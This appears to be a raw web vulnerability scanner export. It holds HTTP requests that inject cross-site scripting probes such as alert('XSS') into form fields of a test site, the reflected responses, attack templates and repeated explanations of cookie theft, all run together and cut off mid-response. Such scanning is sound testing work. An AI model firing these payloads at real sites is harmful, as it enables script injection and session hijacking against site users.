cboPage=</textarea><script>alert('XSS')</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:38 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 194
Content-Type: text/html
Cache-control: private
<html>
<body>
A user should never see this text<br>
this page is a redirect only page. The page that the user
selected was </textarea><script>alert('XSS')</script>
</body>
</html>
Possible TextArea Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This particular type takes place when input is returned embedded in the TEXTAREA paramaters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/testing/
Content-Length: 48
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=<attack></textarea><script>alert('XSS')</script></attack><script>alert\('XSS'\)</script>GET /join.asp?name=&email=&surname=</textarea><script>alert('XSS')</script>&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:32 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4014
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE="</textarea><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible TextArea Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This particular type takes place when input is returned embedded in the TEXTAREA paramaters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=<attack></textarea><script>alert('XSS')</script></attack>&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)</script>GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=--><script>alert('XSS')</script>&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:43 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE="--><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Comment Injection Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place due to the fact that some web applications embed user input in the HTML comments. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=<attack>--><script>alert('XSS')</script></attack>&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
--><script>alert\('XSS'\)<\/script>GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=1"style="background:url(javascript:alert('XSS'))"%20"&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:28 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4025
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE="1"style="background:url(javascript:alert('XSS'))" ""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Form Injection Cross-Site Scripting VulnerabilityCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This type of cross-site scripting attack takes place by using the least amount of non standard characters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=<attack>1"style="background:url(javascript:alert('XSS'))"%20"</attack>&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
"style="background:url\(javascript:alert\('XSS'\)\)GET /join.asp?name=&email=&surname=&house=</textarea><script>alert('XSS')</script>&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:35 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4014
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE="</textarea><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible TextArea Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This particular type takes place when input is returned embedded in the TEXTAREA paramaters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=<attack></textarea><script>alert('XSS')</script></attack>&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)</script>GET /plink.asp?a=b&c=>"'><img%20src="javascript:alert('XSS')"> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:36:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 204
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = b</P>
<P>The parameter "c" = >"'><img src="javascript:alert('XSS')"></P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Possible IMG-Tag Embedded Javascript Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place by embedding potentially malicious JavaScript code using an IMG tag with a specific JavaScript link as its source. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?a=b&c=<attack>>"'><img%20src="javascript:alert('XSS')"></attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
javascript:alert\('XSS'\)">GET /join.asp?name=&email=</textarea><script>alert('XSS')</script>&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:32 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
